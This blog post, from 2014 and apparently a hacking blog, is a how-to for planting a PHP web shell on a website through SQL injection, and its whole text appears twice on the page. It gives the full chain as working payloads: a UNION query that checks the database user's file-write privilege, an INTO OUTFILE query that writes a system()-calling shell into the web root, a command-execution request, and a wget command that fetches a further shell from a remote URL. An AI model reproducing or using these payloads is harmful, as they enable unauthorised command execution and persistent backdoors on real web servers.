Tuesday, February 11, 2014

[HOW TO] UPLOAD SHELL WITH SQL INJECTION QUERIES







Today we will be covering on that how can we upload our shell on a website with
SQL queries. Yes. You can write your shell onto the web server  with SQL statements without logging into the admin panel or any other control panel.
Note: I will not be covering on Basics of SQL Injection. 
But for this you have to met certain requirements.

  • Your must have write privileges and a writable directory (where you have to upload your shell)
  • Root Path (i.e /var/www/website/)
  • Magic Qoutes must be enabled


Now Question is how to check if you have write permissions?
 what you can simply do , you can read file_priv from mysql.user table

localhost/page.php?id=1 union select 1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user--


If it say Y after your current user. then you are lucky and you got write privileges.
You know how to find out what is the current user right? If no then dont worry, its not that tough.
You can find it using user() function.
anyways, now how to get full path? eh that is tough thing, because many websites don't throw full path with mysql errors. so you might need to use some other tricks to get full path disclosure.
okay, you got write privileges,   full path and magic qoutes are enabled. Now What?
Now its time to make use of MySQL statements.
We gonna use INTO OUTFILE. So Basically INTO OUTFILE write your selected rows onto a file.
the basic syntax is

 select column_name from table_name into outfile "filepath/file.extension"
  

 or whatever query result you want to save in any file,  I just gave basic syntax.

So how it gonna help us uploading shell?
We will be writing a small/long (whatever you want) code onto a file in a writable directory.
example:
let us upload a small php code. Suppose you have full path like /var/www/website/public_html/
and we gonna upload php script. <?php system($_REQUEST['cmd'])?>
our query be like:
 http://website.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php"
Alright what will it do is it will create a file named shell.php in the website directory and write that php code on it.

and now we can access our shell with

 http://website.com/shell.php?cmd=whoami

You can run any command after cmd= .

Check this:





 Now you can download your shell on it using with CURL or WGET (I'm talking about Linux).
like  cmd=wget http://website.com/shell.txt -O code.php
 and then you can access your shell with   
 http://website.com/shell.php

Labels: , , , ,

posted by Anuran Barman @ 3:47 AM   0 Comments

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home

AnonLeet: [HOW TO] UPLOAD SHELL WITH SQL INJECTION QUERIES

[HOW TO] UPLOAD SHELL WITH SQL INJECTION QUERIES







Today we will be covering on that how can we upload our shell on a website with
SQL queries. Yes. You can write your shell onto the web server  with SQL statements without logging into the admin panel or any other control panel.
Note: I will not be covering on Basics of SQL Injection. 
But for this you have to met certain requirements.



Now Question is how to check if you have write permissions?
 what you can simply do , you can read file_priv from mysql.user table

localhost/page.php?id=1 union select 1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user--


If it say Y after your current user. then you are lucky and you got write privileges.
You know how to find out what is the current user right? If no then dont worry, its not that tough.
You can find it using user() function.
anyways, now how to get full path? eh that is tough thing, because many websites don't throw full path with mysql errors. so you might need to use some other tricks to get full path disclosure.
okay, you got write privileges,   full path and magic qoutes are enabled. Now What?
Now its time to make use of MySQL statements.
We gonna use INTO OUTFILE. So Basically INTO OUTFILE write your selected rows onto a file.
the basic syntax is

 select column_name from table_name into outfile "filepath/file.extension"
  

 or whatever query result you want to save in any file,  I just gave basic syntax.

So how it gonna help us uploading shell?
We will be writing a small/long (whatever you want) code onto a file in a writable directory.
example:
let us upload a small php code. Suppose you have full path like /var/www/website/public_html/
and we gonna upload php script. <?php system($_REQUEST['cmd'])?>
our query be like:
 http://website.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php"
Alright what will it do is it will create a file named shell.php in the website directory and write that php code on it.

and now we can access our shell with

 http://website.com/shell.php?cmd=whoami

You can run any command after cmd= .

Check this:





 Now you can download your shell on it using with CURL or WGET (I'm talking about Linux).
like  cmd=wget http://website.com/shell.txt -O code.php
 and then you can access your shell with   
 http://website.com/shell.php

Labels: , , , ,